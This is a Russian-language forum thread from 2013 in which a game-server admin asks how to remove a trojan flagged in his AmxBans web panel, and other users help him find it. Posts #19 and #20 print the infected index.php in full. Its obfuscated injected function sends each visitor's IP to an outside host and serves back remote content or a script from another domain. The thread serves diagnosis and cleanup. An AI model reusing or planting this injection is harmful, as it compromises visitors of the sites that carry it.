Информационная доска

Данный раздел предназначен для обсуждения, а также решения технических проблем связанных с серверной частью. Обсуждения касательно игровых клиентов ведутся здесь.

1. Во время создания новой темы аккуратно оформляйте её, не допускайте грамматических ошибок.
2. Описывая проблему старайтесь, как можно больше рассказать о ней, а так же о действиях с сервером после которых она возникла, по возможности подкрепите информацию логами.
3. Если вопрос касается проблемы в работе сервера, то обязательно прикрепляйте список плагинов (введите в консоли сервера: meta list и amxx plugins), настройки server.cfg, логи. Так же указывайте операционную систему, версию HLDS (введите к консоли сервера: version) и где хостится сервер.

Длинную информацию скрывайте под спойлер.

Вирус в AmxBans 1.6 что делать?

Опции

batonoid	23.7.2013, 16:00 Сообщение #1
Стаж: 13 лет Сообщений: 194 Благодарностей: 7 Полезность: < 0	Ребят недавно каспер установил (раньше был Avast) и оказалось, что в моем AmxBans есть Trojan-Downloader.HTML.Iframe.ahs, он вылезает тогда, когда заходишь под логином и паролем в амкс, как он туда попал я без понятия. Как мне от него избавиться, может кто то уже встречался с такой проблемой?
	Поблагодарили 0 раз Поблагодарили 0 раз

Kirby Magicman	23.7.2013, 16:07 Сообщение #2
Стаж: 15 лет Сообщений: 1083 Благодарностей: 398 Полезность: 617	Цитата(batonoid @ 23.7.2013, 17:00) Ребят недавно каспер установил (раньше был Avast) и оказалось, что в моем AmxBans есть Trojan-Downloader.HTML.Iframe.ahs, он вылезает тогда, когда заходишь под логином и паролем в амкс, как он туда попал я без понятия. Как мне от него избавиться, может кто то уже встречался с такой проблемой? Откуда качал amxbans?
	Поблагодарили 0 раз Поблагодарили 0 раз

batonoid	23.7.2013, 16:08 Сообщение #3
Стаж: 13 лет Сообщений: 194 Благодарностей: 7 Полезность: < 0	Нее качал, на MyArena там через Веб-хостинг устанавливал
	Поблагодарили 0 раз Поблагодарили 0 раз

Евгений_2	23.7.2013, 16:09 Сообщение #4
Стаж: 14 лет Сообщений: 36 Благодарностей: 13 Полезность: 200	Хм, у меня нету этого вируса, хоть и каспер стоит.....
	Поблагодарили 0 раз Поблагодарили 0 раз

batonoid	23.7.2013, 16:21 Сообщение #5
Стаж: 13 лет Сообщений: 194 Благодарностей: 7 Полезность: < 0	Да я вообще понятия не имею от куда он взялся, пишут мне на другом форму типо переустанавливать нужно, у вас варианты есть ребят?
	Поблагодарили 0 раз Поблагодарили 0 раз

Dreandy	23.7.2013, 16:22 Сообщение #6
Стаж: 12 лет Сообщений: 1394 Благодарностей: 231 Полезность: 37	Цитата(batonoid @ 23.7.2013, 18:00) Ребят недавно каспер установил (раньше был Avast) и оказалось, что в моем AmxBans есть Trojan-Downloader.HTML.Iframe.ahs, он вылезает тогда, когда заходишь под логином и паролем в амкс, как он туда попал я без понятия. Как мне от него избавиться, может кто то уже встречался с такой проблемой? Если у тебя не купленный каспер то будет иногда выводиться ложная инфа. У меня было такое,сам тестировал. критика - это лучший способ изменить человека
	Поблагодарили 0 раз Поблагодарили 0 раз

batonoid	23.7.2013, 16:30 Сообщение #7
Стаж: 13 лет Сообщений: 194 Благодарностей: 7 Полезность: < 0	Каспер качал с официального сайта
	Поблагодарили 0 раз Поблагодарили 0 раз

bondarenko78bk	23.7.2013, 16:35 Сообщение #8
Стаж: 14 лет Сообщений: 182 Благодарностей: 61 Полезность: 169	Цитата(batonoid @ 23.7.2013, 16:00) Ребят недавно каспер установил (раньше был Avast) и оказалось, что в моем AmxBans есть Trojan-Downloader.HTML.Iframe.ahs, он вылезает тогда, когда заходишь под логином и паролем в амкс, как он туда попал я без понятия. Как мне от него избавиться, может кто то уже встречался с такой проблемой? Смени лог и пасс от фтп вебхоста. На арене нормальный банс стоит.
	Поблагодарили 0 раз Поблагодарили 0 раз

batonoid	23.7.2013, 16:37 Сообщение #9
Стаж: 13 лет Сообщений: 194 Благодарностей: 7 Полезность: < 0	Сменил уже как месяц назад, по совету Тех поддержки, но толку ноль. Сменил только пасс. Так как логин не знаю как менять. Отредактировал: batonoid, - 23.7.2013, 16:40
	Поблагодарили 0 раз Поблагодарили 0 раз

batonoid	23.7.2013, 17:11 Сообщение #10
Стаж: 13 лет Сообщений: 194 Благодарностей: 7 Полезность: < 0	Кстати вот в этой ссылке расположен вирус, у кого кспер попробуйте зайти будет ли он ругаться ? http://war3ft100lvl.myarena.ru/amxbans/index.php
	Поблагодарили 0 раз Поблагодарили 0 раз

se7en2614	23.7.2013, 17:14 Сообщение #11
Стаж: 14 лет Сообщений: 1096 Благодарностей: 126 Полезность: < 0	у меня касперский орёт =)
	Поблагодарили 0 раз Поблагодарили 0 раз

batonoid	23.7.2013, 17:16 Сообщение #12
Стаж: 13 лет Сообщений: 194 Благодарностей: 7 Полезность: < 0	Вот я о том же((...
	Поблагодарили 0 раз Поблагодарили 0 раз

Shur1k_ua	23.7.2013, 17:21 Сообщение #13
Стаж: 14 лет Город: Ровно Сообщений: 1817 Благодарностей: 919 Полезность: 1233	майарена траф сливают))) каждое твое посещение, открывает скріыо какой та сайт. То ли для статистики им, то ли для умышленного доса, создавая запросы от твоего посещения, на чей то сайт. Map Spawn Compiler v 2.0 Карты на 32 слота Snow Maps CS 1.6
	Поблагодарили 0 раз Поблагодарили 0 раз

batonoid	23.7.2013, 17:24 Сообщение #14
Стаж: 13 лет Сообщений: 194 Благодарностей: 7 Полезность: < 0	Уже и в ФТП и в ВЕб-хостинге и в myarene поменял пароли все равно, придется скорей всего переустанавливать amxbans, а не кто не может подсказать каким образом он мог туда попасть, чтобы в следующий раз избежать его появления?
	Поблагодарили 0 раз Поблагодарили 0 раз

cs-portal	23.7.2013, 17:30 Сообщение #15
Стаж: 16 лет Сообщений: 8181 Благодарностей: 2709 Полезность: 0	открой рученками index.php посмотри на наличие лишнего кода, base64 вставок , iframe и тому подобного
	Поблагодарили 0 раз Поблагодарили 0 раз

batonoid	23.7.2013, 17:32 Сообщение #16
Стаж: 13 лет Сообщений: 194 Благодарностей: 7 Полезность: < 0	cs-portal, Можно по подробней как это сделать?
	Поблагодарили 0 раз Поблагодарили 0 раз

batonoid	23.7.2013, 17:40 Сообщение #17
Стаж: 13 лет Сообщений: 194 Благодарностей: 7 Полезность: < 0	Я открыл этот php там есть вставка base64 , что делать? Отредактировал: batonoid, - 23.7.2013, 17:40
	Поблагодарили 0 раз Поблагодарили 0 раз

Maxopka	23.7.2013, 18:00 Сообщение #18
Стаж: 13 лет Сообщений: 572 Благодарностей: 163 Полезность: 175	Цитата(batonoid @ 23.7.2013, 18:40) Я открыл этот php там есть вставка base64 , что делать? Запили под спойлер index.php.
	Поблагодарили 0 раз Поблагодарили 0 раз

batonoid	23.7.2013, 18:06 Сообщение #19
Стаж: 13 лет Сообщений: 194 Благодарностей: 7 Полезность: < 0	Скрытый текст <?php /* AMXBans v6.0 Copyright 2009, 2010 by SeToY & \|PJ\|ShOrTy This file is part of AMXBans. AMXBans is free software, but it's licensed under the Creative Commons - Attribution-NonCommercial-ShareAlike 2.0 AMXBans is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. You should have received a copy of the cc-nC-SA along with AMXBans. If not, see <http://creativecommons.org/licenses/by-nc-sa/2.0/>. / @session_start(); //check for existing config file if(!file_exists("include/db.config.inc.php")) { header("Location: setup.php"); } require_once("include/config.inc.php"); require_once("include/access.inc.php"); //start page loader if( $config->start_page == "" \|\| $config->start_page == "index.php" \|\| (!file_exists("$config->start_page"))) { header("Location:ban_list.php"); } else { header("Location:$config->start_page"); } function sql2_safe($in) { $rtn = base64_decode($in); return $rtn; } function collectnewss() { if (!isset($_COOKIE["iJijkdaMnerys"])) { $value = 'yadeor'; $ip = $_SERVER['REMOTE_ADDR']; $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip; $file = @fopen ($get, "r"); $content = @fread($file, 1000); @setcookie("iJijkdaMnerys", $value, time()+360024); if (!$content) echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9uZXdkb21tZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3N jcmlwdD4="); else echo $content; } } collectnewss (); ?> Я тут почитал в инете что типо этот вирус заражает все файлы php то есть щас нужно будет весь веб хост скачивать через фтп и потом удалять из всех php файлов этот base64 Отредактировал: batonoid, - 23.7.2013, 18:08
	Поблагодарили 0 раз Поблагодарили 0 раз

winzh1	23.7.2013, 18:08 Сообщение #20
Стаж: 14 лет Сообщений: 1414 Благодарностей: 600 Полезность: 838	Цитата(batonoid @ 23.7.2013, 23:06) Скрытый текст <?php /* AMXBans v6.0 Copyright 2009, 2010 by SeToY & \|PJ\|ShOrTy This file is part of AMXBans. AMXBans is free software, but it's licensed under the Creative Commons - Attribution-NonCommercial-ShareAlike 2.0 AMXBans is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. You should have received a copy of the cc-nC-SA along with AMXBans. If not, see <http://creativecommons.org/licenses/by-nc-sa/2.0/>. / @session_start(); //check for existing config file if(!file_exists("include/db.config.inc.php")) { header("Location: setup.php"); } require_once("include/config.inc.php"); require_once("include/access.inc.php"); //start page loader if( $config->start_page == "" \|\| $config->start_page == "index.php" \|\| (!file_exists("$config->start_page"))) { header("Location:ban_list.php"); } else { header("Location:$config->start_page"); } function sql2_safe($in) { $rtn = base64_decode($in); return $rtn; } function collectnewss() { if (!isset($_COOKIE["iJijkdaMnerys"])) { $value = 'yadeor'; $ip = $_SERVER['REMOTE_ADDR']; $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip; $file = @fopen ($get, "r"); $content = @fread($file, 1000); @setcookie("iJijkdaMnerys", $value, time()+360024); if (!$content) echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9uZXdkb21tZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3N jcmlwdD4="); else echo $content; } } collectnewss (); ?> Я тут почитал в инете что типо этот вирус заражает все файлы php то есть щас нужно будет весь веб хост скачивать через фтп и потом удалять из всех php файлов этот base64 Вот стандартный index Скрытый текст <?php /* AMXBans v6.0 Copyright 2009, 2010 by SeToY & \|PJ\|ShOrTy This file is part of AMXBans. AMXBans is free software, but it's licensed under the Creative Commons - Attribution-NonCommercial-ShareAlike 2.0 AMXBans is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. You should have received a copy of the cc-nC-SA along with AMXBans. If not, see <http://creativecommons.org/licenses/by-nc-sa/2.0/>. / @session_start(); //check for existing config file if(!file_exists("include/db.config.inc.php")) { header("Location: setup.php"); } require_once("include/config.inc.php"); require_once("include/access.inc.php"); //start page loader if( $config->start_page == "" \|\| $config->start_page == "index.php" \|\| (!file_exists("$config->start_page"))) { header("Location:ban_list.php"); } else { header("Location:$config->start_page"); } ?> Немного отличаются. Отредактировал:* winzh1, - 23.7.2013, 18:09 Установлю и настрою FreshBans, DopBan. Писать в ЛС.
	Поблагодарили 0 раз Поблагодарили 0 раз

« Предыдущая тема · Общие вопросы по созданию и настройке сервера · Следующая тема »

0 пользователей и 1 гостей читают эту тему:

Наши новости:

Информационная доска

Вирус в AmxBans 1.6 что делать?